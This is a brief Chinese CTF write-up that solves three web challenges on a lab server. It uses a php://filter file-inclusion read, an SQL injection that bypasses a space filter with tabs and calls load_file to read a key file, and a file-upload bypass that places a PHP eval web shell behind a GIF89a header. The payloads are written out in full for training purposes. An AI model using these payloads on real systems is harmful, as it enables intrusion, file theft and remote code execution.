week 6 for cnas writeup

点击阅读全文

文件包含 10

题目链接

http://47.100.121.220:28001/01.php

解答

这个题目又是一个文件包含的题目,这里直接用

1
file=php://filter/read=convert.base64-encode/resource=./key.php

SQL注入 10

题目链接

http://47.100.121.220:28001/02.php

解答

这个题目是一个注入题,经过测试可以知道过滤了空格,这里可以用%09进行绕过

1
2
3
4
5
http://47.100.121.220:28002/02.php?id=1')%09order%09by%091%23 返回正常
http://47.100.121.220:28002/02.php?id=1')%09order%09by%092%23 返回正常
http://47.100.121.220:28002/02.php?id=1')%09order%09by%093%23 返回异常

得到字段数为2

提示key在/tmp/360/key中

然后用load_file()函数读取文件

1
http://47.100.121.220:28002/02.php?id=0%27%29%09union%09select%091,load_file('/tmp/360/key')%23

由于数据读取的问题,把id的值改为不存在的值即可读到key

文件上传 10

题目链接

http://47.100.121.220:28003/03.php

解答

这个上传题是检验文件头的,所以直接在php文件加上图片的文件头即可上传成功

1
2
GIF89a
<?php @eval($_POST['c']);?>

菜刀连接即可。